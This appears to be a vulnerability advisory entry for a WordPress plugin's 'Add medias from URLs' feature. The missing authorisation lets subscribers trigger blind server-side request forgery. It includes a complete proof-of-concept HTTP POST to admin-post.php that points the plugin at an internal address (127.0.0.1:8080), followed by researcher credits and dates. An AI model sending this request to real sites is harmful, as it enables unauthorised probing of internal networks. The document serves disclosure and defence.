The plugin does not have any authorisation and does to ensure that medias added via URLs are external medias, which could allow any authenticated users, such as subscriber to perform blind SSRF attacks
Put an internal URL such as http://127.0.0.1:8080 in the "Add medias from URLs" feature of the plugin (/wp-admin/upload.php?page=add-external-media-without-import) POST /wp-admin/admin-post.php HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: en-GB,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 108 Connection: close Cookie: [subscriber+] Upgrade-Insecure-Requests: 1 urls=http%3A%2F%2F127.0.0.1%3A8080%2Fyolo&width=&height=&mime-type=&action=add_external_media_without_import
Luan Pedersini
IBLISS Digital Security
Yes
2022-04-19 (about 2 months ago)
2022-04-19 (about 2 months ago)
2022-04-20 (about 2 months ago)